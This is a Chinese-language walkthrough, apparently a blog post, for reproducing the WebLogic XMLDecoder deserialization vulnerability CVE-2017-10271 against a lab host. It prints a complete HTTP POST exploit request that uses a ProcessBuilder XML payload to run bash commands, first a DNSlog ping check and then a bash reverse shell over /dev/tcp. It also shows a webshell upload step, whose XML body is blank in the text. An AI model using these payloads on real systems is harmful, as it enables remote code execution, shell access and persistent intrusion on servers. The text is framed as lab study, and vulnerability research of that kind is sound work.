Weblogic反序列化漏洞（CVE-2017-10271）

注意：仅用于技术讨论，切勿用于其他用途，一切后果与本人无关！！！
基本理论

WebLogic  WLS组件中存在XMLDecoder远程代码执行漏洞，可以构造请求对运行WebLogic中间件的主机进行攻击

漏洞产生的原因是因为在调用，xml的时候没有做过滤，从而导致漏洞的产生

漏洞复现

1.找到存在漏洞的页面

2.可以通过DNSLOG来验证漏洞是否存在，首先到网上找一段POC,注意标注中加颜色的部分

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.69.129:7001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: text/xml        //调用xml时候要带上的参数

Content-Length: 607

         java.beans.XMLDecoder">

              java.lang.ProcessBuilder">

                    

             

                    /bin/bash

             

             

                    -c

              

              

                    ping a4b87609.dnsbug.cn

              

          

          

        

     

3.查看DNSLOG发现，存在访问，则漏洞存在

4.反弹shell:

此时我们照样可以将ping  ip的位置改为 

bash -i >& /dev/tcp/192.168.69.129/4444 0>&1    在本地开启监听

5.写入Shell:

POST /wls-wsat/CoordinatorPortType HTTP/1.1

Host: 192.168.69.129:7001

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: text/xml

Content-Length: 638

   

   

   

   

   

   

   

6.访问192.168.69.129:7001/bea_wls_internal/test.jsp，成功写码

总结

        漏洞的产生感觉都是由于过滤的不严谨，以后找漏洞我们可以注重没有过滤的地方，毕竟这么多的代码，总会有疏忽的地方。

参考文章：

Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）_「Vulhub 文档」 - 网安Path weblogic/CVE-2017-10271 Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。参考链接： 组件反序列化https://www.wangan.com/docs/455